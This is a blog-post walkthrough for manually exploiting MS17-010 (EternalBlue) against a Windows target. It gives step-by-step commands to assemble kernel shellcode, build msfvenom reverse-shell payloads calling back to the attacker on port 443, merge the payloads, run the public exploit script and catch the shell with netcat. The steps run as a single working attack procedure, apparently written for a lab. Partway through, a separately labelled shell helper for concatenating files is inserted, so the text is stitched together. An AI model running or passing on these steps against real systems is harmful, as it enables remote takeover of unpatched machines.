Manually Exploiting MS17-010 (python2 to python3)

xyzchris0

Chris

Posted on May 5, 2021


This is a quick write-up on how to exploit MS17-010 after enumerating your victim machine.

I was trying to run Auto-Blue but with the switch from python2 to python3 I was hitting some hurdles. I read somewhere that you can run pyenv as a workaround but I needed this to work in a crunch. This was pulled from the root4loot blogpost and all thanks really goes to them on this one, check it out! Link

Step 1. Grab the code from https://github.com/worawit/MS17-010

Command:

git clone https://github.com/worawit/MS17-010


Step 2. Display the contents of the folder

Command:

ls -l MS17-010/shellcode/


Step 3. The next step in their walk-through is to assemble both the x64 and x86 shellcode and then merge them below. You can get away with only doing one, but if you don't know the target architecture it may not work.

Assemble the x64 kernel shellcode with nasm.

Command:

nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin


Step 4. Now generate a binary payload with your LHOST and name it sc_x64_payload.bin.

Command:

msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=tun0 --platform windows -a x64 --format raw -o sc_x64_payload.bin


Step 5. Concatenate the payload and shellcode.

Command:

cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

Step 6. Now assemble the x86 kernel shellcode with nasm.

Command:

nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin


Step 7. Then generate a binary payload and name this one sc_x86_payload.bin.

Command:

msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=tun0 --platform windows -a x86 --format raw -o sc_x86_payload.bin


Step 8. Concatenate the payload and shellcode.

Command:

cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

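Steps 5 and 8 both rely on the two raw blobs ending up in the right order, so the following is an added example (not from the original post and not part of the worawit/MS17-010 project) of a small POSIX shell helper that concatenates two binary files and verifies the result: the output must be exactly the combined length and must begin with the first input. The function name and the sample file contents are constructed for illustration.

```shell
#!/bin/sh
# Added example, not code from the original post or the MS17-010 project.
# concat_blobs FIRST SECOND OUT
#   Writes FIRST followed by SECOND into OUT and verifies that
#     1. OUT is exactly len(FIRST) + len(SECOND) bytes, and
#     2. OUT begins with the bytes of FIRST (i.e. the order was not swapped).
#   Returns 0 on success, 1 on any missing input or mismatch.
concat_blobs() {
    first="$1"; second="$2"; out="$3"
    # Refuse to proceed on a missing or zero-length input (e.g. a failed nasm run)
    [ -s "$first" ] && [ -s "$second" ] || { echo "missing or empty input" >&2; return 1; }

    cat "$first" "$second" > "$out"

    # tr strips the leading spaces some wc implementations emit
    len_first=$(wc -c < "$first" | tr -d ' ')
    len_second=$(wc -c < "$second" | tr -d ' ')
    len_out=$(wc -c < "$out" | tr -d ' ')

    if [ "$len_out" -ne $((len_first + len_second)) ]; then
        echo "size mismatch: $len_out != $len_first + $len_second" >&2
        return 1
    fi

    # head -c is supported by GNU and BSD coreutils; compare the prefix byte-for-byte
    if ! head -c "$len_first" "$out" | cmp -s - "$first"; then
        echo "output does not start with $first" >&2
        return 1
    fi
    return 0
}

# Constructed sample inputs standing in for the real .bin files
workdir=$(mktemp -d)
printf 'KERNELSTUB' > "$workdir/stub.bin"
printf 'PAYLOAD' > "$workdir/payload.bin"
concat_blobs "$workdir/stub.bin" "$workdir/payload.bin" "$workdir/combined.bin" && echo "combined ok"
```

Call it with the kernel shellcode first and the msfvenom output second; a swapped argument order or an empty input file fails the check instead of silently producing a blob that will not run.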

Step 9. Now it's time to merge them, if that's what you would like to do. This puts both shellcodes into the same binary using the eternalblue_sc_merge.py script.

Command:

python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin


Step 10. Now run the exploit. Just as a warning, I had to run this multiple times to catch a shell and reverted my box as well.

Command:

python MS17-010/eternalblue_exploit7.py targetIP sc_all.bin


Command:

nc -nvlp 443

